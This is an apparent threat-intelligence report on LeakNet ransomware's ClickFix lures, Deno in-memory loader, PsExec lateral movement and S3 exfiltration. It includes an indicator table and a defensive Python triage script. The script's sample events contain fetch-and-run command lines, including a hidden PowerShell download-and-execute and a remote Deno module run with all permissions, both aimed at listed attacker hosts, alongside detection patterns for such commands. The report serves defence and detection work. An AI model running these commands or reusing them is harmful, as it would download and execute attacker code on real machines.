The ransomware group known as LeakNet is changing its tactics, broadening how it gains initial access in order to reach more victims. Previously the group averaged a modest three targets per month and relied mainly on buying stolen network access from other cybercriminals. It is now running its own campaigns, built on deceptive error and verification screens and on a new loader that executes malicious code directly in memory.
Despite these advancements in entry techniques, LeakNet maintains a consistent approach once it infiltrates a network, providing defenders with a valuable opportunity to thwart their efforts before any files are encrypted.
LeakNet Adopts ClickFix and Deno Loader
One of the most notable shifts in LeakNet's strategy is the introduction of ClickFix lures. This method involves compromising legitimate websites so that they display a fraudulent security check, such as a counterfeit Cloudflare Turnstile page, which instructs the visitor to copy a malicious command and paste it into the Windows Run dialog. The lure lets LeakNet cast a wide net across ordinary web users; it broadens the group's reach and lowers its cost per victim, since it no longer has to wait for valuable accounts to surface on dark web markets.
This "bring your own runtime" technique, in which the attackers deliver the legitimate Deno JavaScript runtime to the victim and run their own loader script under it, leaves minimal traces on disk and complicates detection by conventional antivirus. The Deno loader collects information about the infected machine, communicates with the attacker's server, and keeps retrieving additional malicious code without writing a conventional executable to disk. Because Deno is a trusted developer tool, its activity often passes application blocklists unchallenged.
A Predictable Post-Exploitation Playbook
Following initial access, the attackers enumerate the active user sessions and credentials on the host with built-in Windows commands. Armed with that information, they move laterally across the network with PsExec, a standard administrative tool, which leaves its own trail because it installs a service on every target it runs on. Finally, LeakNet stages payloads in, and exfiltrates data to, ordinary Amazon S3 buckets. Because every step relies on stock administrative tools and public cloud services, the activity blends into everyday network traffic, and spotting it takes behavioural context (which process, which parent, which account) rather than file hashes.
Indicators of Compromise
| Indicator type | Value(s) |
|---|---|
| ClickFix domain | tools.usersway[.]net, apiclofront[.]com, sendtokenscf[.]com, binclloudapp[.]com |
| Deno loader C2 domain | okobojirent[.]com, mshealthmetrics[.]com, verify-safeguard[.]top, cnoocim[.]com, delhedghogeggs[.]com, serialmenot[.]com, crahdhduf[.]com |
| Deno loader C2 IP address | 194.31.223[.]42, 144.31.2[.]161, 87.121.79[.]6, 87.121.79[.]25, 144.31.54[.]243, 144.31.224[.]98 |
| Sideloaded jli.dll C2 domain | neremedysoft[.]com, ndibstersoft[.]com, windowallclean[.]com |
| Malicious S3 bucket | fastdlvrss.s3.us-east-1.amazonaws[.]com, backupdailyawss.s3.us-east-1.amazonaws[.]com |
To defend against this, prioritize monitoring for suspicious behaviour over searching for known malicious files. Watch for shell commands launched from web browsers or from the Run dialog (on Windows the Run dialog's children are spawned by explorer.exe), for unexpected connections to cloud storage from ordinary endpoints, and for tools like Deno running outside typical developer environments. Isolating a machine as soon as one of these patterns appears disrupts the attack before ransomware is deployed.
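The behavioural checks described above (the ClickFix one-liner, Deno outside developer paths, S3 traffic from an ordinary endpoint, PsExec lateral movement) as an added example that is not part of the report: a small Python triage script that applies each rule to constructed Sysmon-style process and network records and a constructed service-install record, and additionally scans Explorer's RunMRU registry values, where Windows keeps what was typed into the Run dialog. The field names, the developer-path and backup-agent allowlists, every machine name, account and path, and all hostnames other than those copied from the IOC table are assumptions or constructed data, not observations from the report.

```python
"""Behavioural triage for the intrusion chain described in this article.
Added example, not code from the report. Events are constructed records with
Sysmon-style fields (EventID 1 process creation, 3 network connection) and a
System-log style service install (EventID 7045). Only the indicator hostnames
come from the IOC table; paths, accounts, hosts and allowlists are invented."""
import re
from pathlib import PureWindowsPath

# Subset of the report's IOCs (defanging brackets removed).
IOC_HOSTS = {"tools.usersway.net", "apiclofront.com",      # ClickFix lure hosts
             "okobojirent.com", "mshealthmetrics.com",     # Deno loader C2
             "fastdlvrss.s3.us-east-1.amazonaws.com",      # staging / exfil buckets
             "backupdailyawss.s3.us-east-1.amazonaws.com"}
# Assumed allowlists: Deno's installer puts the binary under %USERPROFILE%\.deno\bin
# (scoop is another common route); only these images may reach S3 from a workstation.
DENO_DEV_PATHS = (r"\.deno\bin\deno.exe", r"\scoop\shims\deno.exe")
S3_ALLOWED_IMAGES = {"onedrive.exe", "backupagent.exe"}
# A ClickFix one-liner lands in a shell; the Run dialog is hosted by explorer.exe,
# in-page lures spawn the shell from the browser itself.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe"}
LURE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
DOWNLOAD_RE = re.compile(r"https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|"
                         r"invoke-expression|\s-e(nc\w*)?\s|frombase64string", re.I)

def _base(path):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()

def check_clickfix(ev):
    """EID 1: shell spawned from Explorer or a browser whose command line fetches code."""
    if (_base(ev["Image"]) in SHELLS and _base(ev["ParentImage"]) in LURE_PARENTS
            and DOWNLOAD_RE.search(ev["CommandLine"])):
        return f"clickfix: {_base(ev['ParentImage'])} spawned {ev['CommandLine'][:48]}"

def check_deno(ev):
    """EID 1: Deno outside developer paths, or running a remote module with -A."""
    if _base(ev["Image"]) != "deno.exe":
        return None
    image, cmd = ev["Image"].lower(), ev["CommandLine"]
    if not any(image.endswith(p) for p in DENO_DEV_PATHS):
        return f"deno outside developer path: {ev['Image']}"
    if re.search(r"\s(-A|--allow-all)\b", cmd) and re.search(r"https?://", cmd, re.I):
        return f"deno running remote code with all permissions: {cmd[:48]}"

def check_cloud_storage(ev):
    """EID 3: traffic to a listed indicator, or S3 traffic from an unexpected image."""
    host, img = ev["DestinationHostname"].lower(), _base(ev["Image"])
    if host in IOC_HOSTS:
        return f"known LeakNet indicator: {img} -> {host}"
    if host.endswith(".amazonaws.com") and img not in S3_ALLOWED_IMAGES:
        return f"unexpected S3 traffic: {img} -> {host}"

def check_psexec(ev):
    """EID 7045: PsExec installs its PSEXESVC service on the target before running."""
    if "psexesvc" in ev.get("ServiceName", "").lower():
        return f"psexec service installed by {ev.get('AccountName', '?')}"

RULES = {1: (check_clickfix, check_deno), 3: (check_cloud_storage,), 7045: (check_psexec,)}

def triage(events):
    """Return (host, finding) pairs in the order the events were seen."""
    alerts = []
    for ev in events:
        for rule in RULES.get(ev["EventID"], ()):
            hit = rule(ev)
            if hit:
                alerts.append((ev["Computer"], hit))
    return alerts

def scan_runmru(values):
    """Explorer's RunMRU key (HKCU\\...\\CurrentVersion\\Explorer\\RunMRU) stores each
    Run-dialog entry as '<command>\\1'; return the ones that look like downloaders."""
    hits = []
    for name, raw in values.items():
        if name != "MRUList":
            cmd = raw[:-2] if raw.endswith("\\1") else raw
            if DOWNLOAD_RE.search(cmd):
                hits.append(cmd)
    return hits

def proc(host, image, parent, cmd):   # constructed EID 1 record
    return {"EventID": 1, "Computer": host, "Image": image, "ParentImage": parent, "CommandLine": cmd}
def net(host, image, dest):           # constructed EID 3 record
    return {"EventID": 3, "Computer": host, "Image": image, "DestinationHostname": dest}

PS, DEV_DENO, DROPPED_DENO = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                              r"C:\Users\alice\.deno\bin\deno.exe", r"C:\Users\Public\Music\deno.exe")
SAMPLE_EVENTS = [
    proc("WS-17", PS, r"C:\Windows\explorer.exe", 'powershell -w hidden -c "iwr https://tools.usersway.net/c | iex"'),
    proc("WS-17", DROPPED_DENO, PS, DROPPED_DENO + " run -A https://okobojirent.com/s2.ts"),
    proc("DEV-03", DEV_DENO, r"C:\Program Files\Microsoft VS Code\Code.exe", "deno test --allow-read ./src"),
    proc("DEV-03", DEV_DENO, PS, "deno run -A https://mshealthmetrics.com/update.ts"),
    net("WS-17", DROPPED_DENO, "fastdlvrss.s3.us-east-1.amazonaws.com"),
    net("FS-01", r"C:\Program Files\Backup\backupagent.exe", "corp-backups.s3.us-east-1.amazonaws.com"),
    net("WS-17", PS, "files-ws17.s3.us-east-1.amazonaws.com"),
    {"EventID": 7045, "Computer": "FS-01", "ServiceName": "PSEXESVC", "AccountName": r"CORP\svc_admin"},
]
SAMPLE_RUNMRU = {"a": r'powershell -w hidden -c "iwr https://tools.usersway.net/c | iex"\1',
                 "b": r"notepad\1", "c": r"cmd /c ipconfig\1", "MRUList": "cab"}

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(f"{host:7} {finding}")
    print("RunMRU:", scan_runmru(SAMPLE_RUNMRU))
```

Run against the constructed data, the script raises six findings: the ClickFix one-liner on WS-17, the dropped Deno binary outside any developer path, the developer-path Deno pulling a remote module with all permissions on DEV-03, the Deno-to-bucket and PowerShell-to-bucket connections, and the PsExec service install on FS-01; the backup agent's own S3 traffic and the developer's local `deno test` produce nothing. The RunMRU scan is the host-forensics counterpart: even where process telemetry is missing, the pasted command survives in the registry.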